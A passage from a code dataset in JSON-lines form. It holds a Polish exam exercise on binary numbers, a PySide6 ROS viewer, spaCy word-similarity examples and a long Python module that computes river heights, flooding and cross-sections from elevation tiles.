fetch fail count\", labelnames=[\"hostname\"]\n)\n", "repo_name": "TencentBlueKing/bk-sops", "sub_path": "metrics.py", "file_name": "metrics.py", "file_ext": "py", "file_size_in_byte": 1718, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1001, "dataset": "github-code", "pt": "53", "api": [{"api_name": "socket.gethostname", "line_number": 8, "usage_type": "call"}, {"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 13, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 29, "usage_type": "call"}, {"api_name": "prometheus_client.Gauge", "line_number": 41, "usage_type": "call"}, {"api_name": "prometheus_client.Gauge", "line_number": 44, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 47, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 50, "usage_type": "call"}, {"api_name": "prometheus_client.Histogram", "line_number": 53, "usage_type": "call"}, {"api_name": "prometheus_client.Counter", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "19812397452", "text": "# Arkusz: https://cke.gov.pl/images/_EGZAMIN_MATURALNY_OD_2015/Arkusze_egzaminacyjne/2015/formula_od_2015/MIN-R2_1P-152.pdf\n# Wyniki: https://cke.gov.pl/images/_EGZAMIN_MATURALNY_OD_2015/Arkusze_egzaminacyjne/2015/formula_od_2015/odpowiedzi/MIN-R1-N.pdf\nfrom collections import Counter\n\n\ndef wczytaj(nazwa):\n with open(nazwa) as plik:\n # return list(map(str.strip, plik)) # SKRÓTOWIEC\n\n wynik = []\n for linia in plik:\n wynik.append(linia.strip())\n return wynik\n\n\ndef przezerowane(liczby):\n # return sum(1 for i in liczby if Counter(i).most_common(1)[0][0] == '0') # SKRÓTOWIEC\n\n suma = 0\n for i in liczby:\n if Counter(i).most_common(1)[0][0] == \"0\":\n suma += 1\n return suma\n\n\ndef podzielne(liczby):\n przez_2 = 0\n przez_8 = 0\n for liczba in liczby:\n if liczba[-1] == \"0\":\n przez_2 += 1\n if liczba[-3:] == \"000\":\n przez_8 += 1\n\n return {\"2\": przez_2, \"8\": przez_8}\n\n\ndef gdzie_minmax(liczby):\n # algorytmicznie suboptymalne, ale bardziej idiomatyczne\n pomocnik = [int(i, 2) for i in liczby]\n gdzie_min = pomocnik.index(min(pomocnik))\n gdzie_max = pomocnik.index(max(pomocnik))\n return gdzie_min, gdzie_max\n\n\nif __name__ == \"__main__\":\n liczby = wczytaj(\"liczby.txt\")\n\n wynik = podzielne(liczby)\n gdzie_min, gdzie_max = gdzie_minmax(liczby)\n\n print(f\"Liczb mających więcej zer niż jedynek: {przezerowane(liczby)}.\")\n print(f\"Liczb podzielnych przez 2: {wynik['2']}.\")\n print(f\"Liczb podzielnych przez 8: {wynik['8']}.\")\n print(\n f\"Najmniejsza liczba znajduje się w wierszu {gdzie_min + 1}\"\n ) # bo w życiu liczymy od 1\n print(f\"Największa liczba znajduje się w wierszu {gdzie_max + 1}\")\n", "repo_name": "dekoza/pymatura", "sub_path": "N_2015/zad4.py", "file_name": "zad4.py", "file_ext": "py", "file_size_in_byte": 1765, "program_lang": "python", "lang": "pl", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.Counter", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "31287668350", "text": "import sys\nimport os\n\nfrom PySide6.QtCore import QUrl, Signal\nfrom PySide6.QtWidgets import QApplication, QMainWindow\nfrom PySide6.QtWebChannel import QWebChannel\nfrom PySide6.QtWebEngineWidgets import QWebEngineView\n\nfrom .ros_handler import ROS2Thread, SignalHandler\nfrom .backend import Backend\n\nclass MainWindow(QMainWindow):\n def __init__(self) -> None:\n super().__init__()\n\n self.setWindowTitle('ROSTron Viewer')\n\n # Field\n self.web = QWebEngineView(self)\n self.channel = QWebChannel()\n self.web.page().setWebChannel(self.channel)\n self.backend = Backend()\n self.channel.registerObject(\"backend\", self.backend)\n\n url = QUrl.fromLocalFile(os.path.join(\n os.path.dirname(__file__), \"index.html\"))\n self.web.load(url)\n self.setCentralWidget(self.web)\n\n # ROS2 Thread\n self.ros_thread = ROS2Thread(parent=self)\n self.ros_thread.start()\n\n # Signal Handler\n SignalHandler().field.connect(self.backend.set_field)\n SignalHandler().ball.connect(self.backend.set_ball)\n SignalHandler().yellow.connect(self.backend.set_yellow)\n SignalHandler().allies.connect(self.backend.set_allies)\n SignalHandler().opponents.connect(self.backend.set_opponents)\n SignalHandler().add_annotation.connect(self.backend.add_annotation)\n SignalHandler().del_annotation.connect(self.backend.del_annotation)\n\n\n\ndef main():\n app = QApplication(sys.argv)\n w = MainWindow()\n w.showMaximized()\n app.exec()\n", "repo_name": "NAELIC/rostron_viewer", "sub_path": "rostron_viewer/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PySide6.QtWidgets.QMainWindow", "line_number": 12, "usage_type": "name"}, {"api_name": "PySide6.QtWebEngineWidgets.QWebEngineView", "line_number": 19, "usage_type": "call"}, {"api_name": "PySide6.QtWebChannel.QWebChannel", "line_number": 20, "usage_type": "call"}, {"api_name": "backend.Backend", "line_number": 22, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QUrl.fromLocalFile", "line_number": 25, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QUrl", "line_number": 25, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "ros_handler.ROS2Thread", "line_number": 31, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 36, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 37, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 38, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 39, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 40, "usage_type": "call"}, {"api_name": "ros_handler.SignalHandler", "line_number": 41, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QApplication", "line_number": 46, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 46, "usage_type": "attribute"}]}
+{"seq_id": "35849913772", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 22 17:14:46 2019\n\n@author: Josh\n\"\"\"\n\n#Similarity examples (1)\n\nimport spacy\n\nnlp = spacy.load('en_core_web_md')\n\n#Compare two documents\ndoc1 = nlp(\"I like fast food\")\ndoc2 = nlp(\"I like pizza\")\nprint(doc1.similarity(doc2))\n\n#Compare two tokens\ndoc = nlp(\"I like pizza and pasta\")\ntoken1 = doc[2]\ntoken2 = doc[4]\nprint(token1.similarity(token2))\n\n#Similarity examples (2)\n\n#Compare a document with a token\ndoc = nlp(\"I like pizza\")\ntoken = nlp(\"soap\")[0]\n\nprint(doc.similarity(token))\n\n#Compare a span with a document\nspan = nlp(\"I like pizza and pasta\")[2:5]\ndoc = nlp(\"McDonalds sells burgers\")\n\nprint(span.similarity(doc))\n\n#Word vectors in spaCy\n\ndoc = nlp(\"I have a banana\")\n#Access the vector via the token.vector attribute\nprint(doc[3].vector)\n\n#Similarity depends on the application context\n\ndoc1 = nlp(\"I like cats\")\ndoc2 = nlp(\"I hate cats\")\n\nprint(doc1.similarity(doc2))", "repo_name": "joshuagladwin/Advanced-NLP-with-spaCy", "sub_path": "Chapter 2 - Large-scale data analysis with spaCy/8 - Word vector and semantic similarities.py", "file_name": "8 - Word vector and semantic similarities.py", "file_ext": "py", "file_size_in_byte": 927, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "spacy.load", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "1975467335", "text": "import WaterShed\n\nimport pandas as pd\nimport numpy as np\nfrom numpy import unravel_index\nimport pytz\nfrom datetime import datetime\nimport networkx as nx\nfrom tqdm import tqdm\nfrom os import path\nimport os\n\n\n\nclass Graph():\n\n def __init__(self, dem=None, fdir=None, acc=None, compression=1):\n self.dem = dem\n self.fdir = fdir\n self.acc = acc\n self.compression = compression\n self.point_size_meteres = 35\n\n\n def compute_height(self, file_path, DEMs_path, min_acc, save_path):\n df = pd.read_csv(file_path, sep=';', decimal=',')\n df['x_lon_int'] = df['x_lon'].values.astype(int)\n df['y_lat_int'] = df['y_lat'].values.astype(int)\n \n # Sort df by x_lon and y_lat for future reduction of DEM computing\n df.sort_values(['x_lon_int', 'y_lat_int'], axis = 0, ascending = True, inplace = True, na_position = \"first\")\n \n dt_string = datetime.now(pytz.timezone('Europe/Moscow')).strftime(\"%d_%m_%Y__%H:%M\")\n self.df_new = pd.DataFrame(columns=['hstation_id', 'x_lon', 'y_lat', 'height', 'distance_m', 'error'])\n self.df_new = self.df_new.astype(dtype= {'hstation_id':'int64', 'height':'int64', 'distance_m':'int64', 'error':'int64'})\n x_lon_past, y_lat_past = None, None\n\n for i, row in df.iterrows():\n print(f'{i+1}/{df.shape[0]} hydropost...')\n hstation_id = int(row[0])\n x_lon, y_lat = row[1], row[2]\n coordinate = (x_lon, y_lat)\n\n # Define coordinate of map to download \n lng_num, lat_num = int(x_lon), int(y_lat)\n\n # Check if this coordinates weren't calculated\n if (x_lon_past != lng_num) or (y_lat_past != lat_num):\n x_lon_past, y_lat_past = lng_num, lat_num\n # Set acc values as None to calulate them later\n self.acc_slice = None\n self.acc_Graph = None\n \n if lat_num+1 < 60:\n self.point_size_meteres = 35\n self.compression = 2\n else:\n self.point_size_meteres = 65\n self.compression = 1\n\n self.tif_pathes = []\n for i in range(lat_num-1, lat_num+2):\n for j in range(lng_num-1, lng_num+2):\n lat = str(i)\n lng = ''.join((['0'] + list(str(int(j))))[-3:])\n file_name = f'n{lat}_e{lng}_1arc_v3.tif' if lat_num+1 < 60 else f'n{lat}_e{lng}_1arc_v3_1201x1201.tif'\n self.tif_pathes.append(f'{DEMs_path}/{file_name}')\n \n # check if files 'exisits'\n success_list = []\n for tif_path in self.tif_pathes:\n if path.exists(tif_path) == False:\n print(f'{tif_path} is not exist in path {DEMs_path}')\n success_list.append(False)\n\n # Download DEM and preprocess it\n if len(success_list) == 0:\n print('All required DEMs exist')\n self.compute_DEM(self.tif_pathes, lng_num, lat_num, compression=self.compression)\n else:\n # Temporary while I'm thinking what to with others frames DEMs\n print('Not all required DEMs exist')\n self.compression = 1\n self.acc = None\n self.dem = None\n self.fdir = None\n \n\n # Calculate Heights\n top_left = (lng_num-1, lat_num+2) if len(self.tif_pathes) == 9 else (lng_num, lat_num+1)\n bottom_right = (lng_num+2, lat_num-1) if len(self.tif_pathes) == 9 else (lng_num+1, lat_num)\n\n if self.dem is not None:\n height, distance, success = self.compute_height_differance(coordinate, top_left, bottom_right, 10000, min_acc)\n error = 1 if success == False else 0\n\n dct = {\n 'hstation_id': hstation_id, \n 'x_lon': x_lon, \n 'y_lat': y_lat, \n 'height': int(height),\n 'distance_m': int(distance),\n 'error': int(error)\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{dt_string}_hydroposts_height_calculated.csv', sep=';', decimal=',', index=False)\n else:\n # here is save for error hydropost (corner hydropost without all DEMs)\n dct = {\n 'hstation_id': hstation_id, \n 'x_lon': x_lon, \n 'y_lat': y_lat, \n 'height': 0,\n 'distance_m': 0,\n 'error': 1\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{dt_string}_hydroposts_height_calculated.csv', sep=';', decimal=',', index=False)\n\n \n\n def compute_DEM(self, pathes, lng_num, lat_num, compression=3):\n if len(pathes) == 9:\n shed = WaterShed.WaterSheds(files_pathes=pathes, compute_acc=True, compression=compression)\n self.compression = compression\n self.acc = shed.acc\n self.dem = shed.dem\n self.fdir = shed.fdir\n else:\n # Use only central tile\n lat = str(lat_num)\n lng = ''.join((['0'] + list(str(int(lng_num))))[-3:])\n shed = WaterShed.WaterSheds(file_path=f'n{lat}_e{lng}_1arc_v3.tif', compute_acc=True)\n self.compression = compression\n self.acc = shed.acc\n self.dem = shed.dem\n self.fdir = shed.fdir\n\n\n def compute_height_differance(self, coordinate, top_left, bottom_right, lenth, min_acc):\n # In case to not create acc_graph every time for same lon & lat\n if (self.acc_slice is None) or (self.acc_Graph is None):\n acc_slice = self.acc.copy()\n # Filter river cells\n self.create_acc_graph(acc_slice, self.fdir, min_acc)\n\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n river_pathes_nodes_DOWN, river_pathes_nodes_UP, distance, success = self.compute_river_path(point, lenth)\n\n start, end = river_pathes_nodes_DOWN[-1], river_pathes_nodes_UP[-1]\n start_height, end_height = self.dem[start], self.dem[end]\n return abs(start_height - end_height), distance, success\n\n\n def compute_river_path(self, point, lenth):\n \"\"\"\n Function returns all river nodes down and up from the given point.\n * lenth - in meteres from start to up and down.\n \"\"\"\n point_lenth = self.compression * self.point_size_meteres # around 35 meteres shape for each point\n\n # DOWN\n river_pathes_lenght_DOWN = int(lenth/point_lenth) # количество затопленных клеток реки вниз по течению\n river_pathes_nodes_DOWN = [point] # Стартовая точка тоже входит.\n node = point\n for _ in tqdm(range(river_pathes_lenght_DOWN)):\n try:\n new_node = self.out_node(node)\n river_pathes_nodes_DOWN.append(new_node)\n node = new_node\n except:\n print(f\"Out nodes not definded.\\nLast node: {river_pathes_nodes_DOWN[-1]}\\nCollected {len(river_pathes_nodes_DOWN)} nodes\")\n break\n \n # UP\n river_pathes_lenght_UP = int(lenth/point_lenth) # количество затопленных клеток реки вверх по течению\n river_pathes_nodes_UP = [point] # Стартовая точка тоже входит.\n node = point\n for _ in tqdm(range(river_pathes_lenght_UP)):\n try:\n new_node = self.in_node(node)\n river_pathes_nodes_UP.append(new_node)\n node = new_node\n except:\n print(f\"Out nodes not definded.\\nLast node: {river_pathes_nodes_UP[-1]}\\nCollected {len(river_pathes_nodes_UP)} nodes\")\n break\n \n distance = (len(river_pathes_nodes_DOWN) + len(river_pathes_nodes_UP)) * point_lenth\n success = True if (len(river_pathes_nodes_DOWN) == river_pathes_lenght_DOWN + 1) and (len(river_pathes_nodes_UP) > (0.5*river_pathes_lenght_UP)) else False\n return river_pathes_nodes_DOWN, river_pathes_nodes_UP, distance, success\n\n\n def coordinate2point(self, coordinate, top_left, bottom_right):\n # lng - horizontal, lat - vertical\n # shape[0] - vertical \n # shape[1] - horizontal\n lng, lat = coordinate\n lng_left, lng_right = top_left[0], bottom_right[0]\n lat_top, lat_bottom = top_left[1], bottom_right[1]\n lng = abs(lng_left - lng) / abs(lng_left - lng_right)\n lat = 1 - (abs(lat_bottom - lat) / abs(lat_top - lat_bottom))\n\n x_path, y_path = 1/self.dem.shape[1], 1/self.dem.shape[0]\n x_coordinate = int(round(lng/x_path, 0))\n y_coordinate = int(round(lat/y_path, 0))\n\n # Check that coordinate contains right cell\n # There can be error with rounding\n if self.accumulation_for_point((y_coordinate, x_coordinate)) < 1000:\n acc_near = self.acc[\n y_coordinate-4 : y_coordinate+5,\n x_coordinate-4 : x_coordinate+5\n ]\n max_index = unravel_index(acc_near.argmax(), acc_near.shape)\n y_coordinate = y_coordinate + max_index[0]-4\n x_coordinate = x_coordinate + max_index[1]-4\n return (y_coordinate, x_coordinate)\n else:\n return (y_coordinate, x_coordinate)\n\n\n def create_acc_graph(self, acc_slice, dir_slice, min_acc):\n acc_slice[acc_slice < min_acc] = 0\n self.acc_slice = acc_slice # For future nodes matching\n self.acc_Graph = nx.DiGraph()\n for i in range(1, acc_slice.shape[0]-1):\n for j in range(1, acc_slice.shape[1]-1):\n if acc_slice[i, j] != 0:\n dir = dir_slice[i, j]\n dir = dir if dir >= 1 else 1\n start = (i, j)\n target = self.fdir_coordinate(start, dir)\n #print(start, target)\n self.acc_Graph.add_edge(start, target)\n\n\n def fdir_coordinate(self, point, dir):\n (row, column) = point\n if dir == 64: #Up\n return (row - 1, column)\n elif dir == 128: #Up-Right\n return (row - 1, column + 1)\n elif dir == 1: #Right\n return (row, column + 1)\n elif dir == 2: #Down-Right\n return (row + 1, column + 1)\n elif dir == 4: #Down\n return (row + 1, column)\n elif dir == 8: #Down-Left\n return (row + 1, column - 1)\n elif dir == 16: #Left\n return (row, column - 1)\n else: #Up-Left\n return (row - 1, column - 1)\n\n \n def out_node(self, node):\n return [node for node in self.acc_Graph.edges(node)][0][1]\n\n def out_node_G(self, node):\n return [node for node in self.G.edges(node)][0][1]\n\n def in_node(self, node):\n in_nodes = [edge[0] for edge in self.acc_Graph.in_edges(node)]\n nodes_accumulation = [self.acc_slice[node[0], node[1]] for node in in_nodes]\n return in_nodes[nodes_accumulation.index(max(nodes_accumulation))]\n \n def in_nodes(self, node):\n return [node[0] for node in self.G.in_edges(node)]\n\n\n def accumulation_for_point(self, point):\n return self.acc[point[0], point[1]]\n\n\n\n \n # Flood Part\n\n def compute_flood(self, coordinate, top_left, bottom_right, lenth, target_h, uniform_flooding=False):\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n y, x = point[0], point[1]\n lenth_with_offset = int(lenth/(self.point_size_meteres * self.compression) + 40) # For offset\n flood_area_fdir = self.fdir[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n flood_area_dem = self.dem[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n flood_area_acc = self.acc.copy()\n flood_area_acc = flood_area_acc[y-lenth_with_offset:y+lenth_with_offset, x-lenth_with_offset:x+lenth_with_offset]\n new_x, new_y = lenth_with_offset, lenth_with_offset\n new_point = (new_y, new_x)\n\n # Create temporary acc graph\n self.create_acc_graph(flood_area_acc, flood_area_fdir, 200)\n\n # Get river pathes\n river_pathes_nodes_DOWN, river_pathes_nodes_UP, _, success = self.compute_river_path(new_point, lenth)\n\n # Graph for specified area\n self.G = nx.DiGraph()\n shape = flood_area_fdir.shape\n\n for row in range(1, shape[0]-1):\n for column in range(1, shape[1]-1):\n dir = flood_area_fdir[row, column]\n start = (row, column)\n target = self.fdir_coordinate(start, dir)\n self.G.add_edge(start, target)\n\n # Make flood\n if uniform_flooding == False:\n self.h = flood_area_dem[new_y, new_x] + target_h\n\n flooded_nodes_down = []\n all_out_nodes = [] # For both up and down\n for i, node in enumerate(river_pathes_nodes_DOWN[::-1]): # Начинаем с последней затопленной клетки\n all_nodes = [node]\n nodes = [node]\n out_nodes_log = []\n if uniform_flooding:\n self.h = flood_area_dem[node[0], node[1]] + target_h\n\n while len(nodes) > 0:\n node_ = nodes[0]\n if node_ == river_pathes_nodes_DOWN[0]:\n nodes.pop(0)\n break\n\n nodes.pop(0)\n in_nodes = self.in_nodes(node_)\n #print(node, in_nodes)\n if len(in_nodes) == 0:\n break\n\n intersection = set(river_pathes_nodes_DOWN).intersection(set(in_nodes))\n if len(intersection) > 0:\n in_nodes.remove(list(intersection)[0]) # Удаление участков реки ниже. Чтобы обрабатывать только области у рек.\n \n\n in_nodes_ = [node for node in in_nodes if flood_area_dem[node[0], node[1]] <= self.h]\n \n all_nodes += in_nodes_\n nodes.append(in_nodes_)\n\n # adding in-edge parts\n out_nodes = [node for node in in_nodes if flood_area_dem[node[0], node[1]] > self.h]\n \n for out_node in out_nodes:\n start, end = out_node, self.out_node_G(out_node)\n start_height, end_height = flood_area_dem[start[0], start[1]], flood_area_dem[end[0], end[1]]\n height_rise = abs(end_height - self.h)\n height_difference = abs(start_height - end_height)\n meter_path = height_difference / self.point_size_meteres\n point_path = round(height_rise / meter_path, 0) # * out of self.point_size_meteres (in meteres). From end (lower) to upper.\n out_nodes_log.append((out_node, end, point_path))\n \n if len(all_nodes) == 0:\n continue\n flooded_nodes_down += all_nodes\n all_out_nodes += out_nodes_log\n\n flooded_nodes_up = []\n for i, node in enumerate(river_pathes_nodes_UP): # Начинаем с первой клетки\n all_nodes = [node]\n nodes = [node]\n out_nodes_log = []\n if uniform_flooding:\n self.h = flood_area_dem[node[0], node[1]] + target_h\n\n while len(nodes) > 0:\n node_ = nodes[0]\n if node_ == river_pathes_nodes_UP[-1]:\n nodes.pop(0)\n break\n\n nodes.pop(0)\n in_nodes = self.in_nodes(node_)\n if len(in_nodes) == 0:\n break\n\n intersection = set(river_pathes_nodes_UP).intersection(set(in_nodes))\n if len(intersection) > 0:\n in_nodes.remove(list(intersection)[0]) # Удаление участков реки ниже. Чтобы обрабатывать только области у рек.\n \n in_nodes_ = [node for node in in_nodes if flood_area_dem[node[0], node[1]] <= self.h]\n \n all_nodes += in_nodes_\n nodes.append(in_nodes_)\n\n # adding in-edge parts\n out_nodes = [node for node in in_nodes if flood_area_dem[node[0], node[1]] > self.h]\n \n for out_node in out_nodes:\n start, end = out_node, self.out_node_G(out_node)\n start_height, end_height = flood_area_dem[start[0], start[1]], flood_area_dem[end[0], end[1]]\n height_rise = abs(end_height - self.h)\n height_difference = abs(start_height - end_height)\n meter_path = height_difference / self.point_size_meteres\n point_path = round(height_rise / meter_path, 0) # * out of self.point_size_meteres (in meteres). From end (lower) to upper.\n out_nodes_log.append((out_node, end, point_path))\n\n \n if len(all_nodes) == 0:\n continue\n flooded_nodes_up += all_nodes\n all_out_nodes += out_nodes_log\n\n self.h = flood_area_dem[new_y, new_x] + target_h\n return flood_area_acc.shape, flooded_nodes_down, flooded_nodes_up, all_out_nodes, flood_area_dem, self.h, point, lenth_with_offset\n\n \n def get_step(self, y_delta, x_delta):\n \"\"\"\n Calculate step for future river slice\n \"\"\"\n if ((y_delta > 3) and (x_delta > 3)) \\\n or ((y_delta < -3) and (x_delta < -3)):\n return (1, 1)\n elif ((y_delta > 3) and (x_delta < -3)) \\\n or ((y_delta < -3) and (x_delta >3)):\n return (1, -1)\n elif x_delta <= 3:\n return (0, 1)\n else:\n return (1, 0)\n\n \n def get_river_slice(self, file_path, DEMs_path, save_path):\n df = pd.read_csv(file_path, sep=';', decimal=',')\n df['x_lon_int'] = df['x_lon'].values.astype(int)\n df['y_lat_int'] = df['y_lat'].values.astype(int)\n \n # Sort df by x_lon and y_lat for future reduction of DEM computing\n df.sort_values(['x_lon_int', 'y_lat_int'], axis = 0, ascending = True, inplace = True, na_position = \"first\")\n \n # Creat new df to save successes of river slices\n self.df_new = pd.DataFrame(columns=['hstation_id', 'success'])\n \n # For future save\n self.dt_string = datetime.now(pytz.timezone('Europe/Moscow')).strftime(\"%d_%m_%Y__%H:%M\")\n \n x_lon_past, y_lat_past = None, None\n \n for i, row in df.iterrows():\n print(f'{i+1}/{df.shape[0]} hydropost...')\n hstation_id = int(row[0])\n x_lon, y_lat = row[1], row[2]\n max_height = int(row[3])\n coordinate = (x_lon, y_lat)\n \n # Define coordinate of map to download \n lng_num, lat_num = int(x_lon), int(y_lat)\n\n # Check if this coordinates weren't calculated\n if (x_lon_past != lng_num) or (y_lat_past != lat_num):\n x_lon_past, y_lat_past = lng_num, lat_num\n\n self.tif_pathes = []\n for i in range(lat_num-1, lat_num+2):\n for j in range(lng_num-1, lng_num+2):\n lat = str(i)\n lng = ''.join((['0'] + list(str(int(j))))[-3:])\n file_name = f'n{lat}_e{lng}_1arc_v3.tif' if lat_num+1 < 60 else f'n{lat}_e{lng}_1arc_v3_1201x1201.tif'\n self.tif_pathes.append(f'{DEMs_path}/{file_name}')\n \n # check if files 'exisits'\n success_list = []\n for tif_path in self.tif_pathes:\n if path.exists(tif_path) == False:\n print(f'{tif_path} is not exist in path {DEMs_path}')\n success_list.append(False)\n\n # Download DEM and preprocess it\n if len(success_list) == 0:\n print('All required DEMs exist')\n self.compute_DEM(self.tif_pathes, lng_num, lat_num, compression=1)\n else:\n # Temporary while I'm thinking what to with others frames DEMs\n print('Not all required DEMs exist')\n self.compression = 1\n self.acc = None\n self.dem = None\n self.fdir = None\n \n \n # Calculate Heights\n top_left = (lng_num-1, lat_num+2) if len(self.tif_pathes) == 9 else (lng_num, lat_num+1)\n bottom_right = (lng_num+2, lat_num-1) if len(self.tif_pathes) == 9 else (lng_num+1, lat_num)\n\n if self.dem is not None:\n point = self.coordinate2point(coordinate, top_left, bottom_right)\n \n # Coordinates for defining river path\n new_top_left, new_bottom_right = (point[0]-20, point[1]-20), (point[0]+20, point[1]+20)\n cut_fdir = self.fdir[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n cut_acc = self.acc[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n cut_dem = self.dem[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n\n # Graph for specified area\n G = nx.DiGraph()\n shape = cut_fdir.shape\n\n try:\n for row in range(1, shape[0]-1):\n for column in range(1, shape[1]-1):\n dir = cut_fdir[row, column]\n start = (row, column)\n target = self.fdir_coordinate(start, dir)\n G.add_edge(start, target)\n except:\n dct = {\n 'hstation_id': hstation_id, \n 'success': 0\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/river_slice_success_table.csv', sep=';', decimal=',', index=False)\n continue\n\n real_coord = (point[0] - new_top_left[0], point[1] - new_top_left[1])\n \n def out_node_G(node):\n return [node for node in G.edges(node)][0][1]\n \n def in_node_G(node):\n in_nodes = [edge[0] for edge in G.in_edges(node)]\n nodes_accumulation = [cut_acc[node[0], node[1]] for node in in_nodes]\n return in_nodes[nodes_accumulation.index(max(nodes_accumulation))]\n\n outs = [real_coord]\n while len(outs) < 5:\n out = out_node_G(outs[-1])\n outs.append(out)\n\n ins = [real_coord]\n while len(ins) < 5:\n in_ = in_node_G(ins[-1])\n ins.append(in_)\n \n # Clearing instances\n del G, new_top_left, new_bottom_right, cut_fdir, cut_acc, cut_dem\n \n \n # Coordinates for river shape\n# new_top_left, new_bottom_right = (point[0]-550, point[1]-550), (point[0]+550, point[1]+550)\n# cut_fdir = self.fdir[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n# cut_acc = self.acc[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n# cut_dem = self.dem[new_top_left[0]:new_bottom_right[0], new_top_left[1]:new_bottom_right[1]]\n\n start, end = ins[-1], outs[-1]\n y_delta, x_delta = end[0] - start[0], end[1] - start[1]\n\n step = self.get_step(y_delta, x_delta)\n# real_coord = (point[0] - new_top_left[0], point[1] - new_top_left[1])\n# target_height = cut_dem[real_coord] + 15\n target_height = self.dem[point] + max_height\n# start = real_coord\n start = point\n\n# right_heights = [self.dem[real_coord]]\n# right_coords = [real_coord]\n right_heights = [self.dem[point]]\n right_coords = [point]\n while (max(right_heights) < target_height) and (len(right_heights) < 540):\n start = [sum(x) for x in zip(start, step)]\n# height = cut_dem[start[0], start[1]]\n height = self.dem[start[0], start[1]]\n right_heights.append(height)\n right_coords.append(start)\n\n# start = real_coord\n start = point\n step = [-i for i in step]\n# left_heights = [cut_dem[real_coord]]\n# left_coords = [real_coord]\n left_heights = [self.dem[point]]\n left_coords = [point]\n while (max(left_heights) < target_height) and (len(left_heights) < 540):\n start = [sum(x) for x in zip(start, step)]\n# height = cut_dem[start[0], start[1]]\n height = self.dem[start[0], start[1]]\n left_heights.append(height)\n left_coords.append(start)\n\n river_slice = left_heights[::-1] + right_heights[1:]\n coords_slice = left_coords[::-1] + right_coords[1:]\n coords_bin_slice = [0 if type(coord) != tuple else 1 for coord in coords_slice]\n\n if os.path.exists(f'{save_path}/{hstation_id}') == False:\n os.makedirs(f'{save_path}/{hstation_id}')\n\n path_to_csv = f'{save_path}/{hstation_id}/{hstation_id}_river_slice.csv'\n final_df = pd.DataFrame({'HEIGHTS': river_slice, 'WaterpostFlag': coords_bin_slice})\n final_df['meteres_path'] = 30 if lat_num+1 <= 60 else 60\n final_df.to_csv(path_to_csv, index=False, sep=';')\n \n dct = {\n 'hstation_id': hstation_id, \n 'max_height': max_height,\n 'success': 1\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{self.dt_string}_river_slice_success_table.csv', sep=';', decimal=',', index=False)\n \n else:\n # here is save for error hydropost (corner hydropost without all DEMs)\n dct = {\n 'hstation_id': hstation_id,\n 'max_height': max_height,\n 'success': 0\n }\n self.df_new = self.df_new.append(dct, ignore_index=True)\n self.df_new.to_csv(f'{save_path}/{self.dt_string}_river_slice_success_table.csv', sep=';', decimal=',', index=False)\n", "repo_name": "nikitaoltyan/MCHS_WaterSheds", "sub_path": "Graph.py", "file_name": "Graph.py", "file_ext": "py", "file_size_in_byte": 27639, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "pytz.timezone", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "name"}, {"api_name": "WaterShed.WaterSheds", "line_number": 124, "usage_type": "call"}, {"api_name": "WaterShed.WaterSheds", "line_number": 133, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 166, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 179, "usage_type": "call"}, {"api_name": 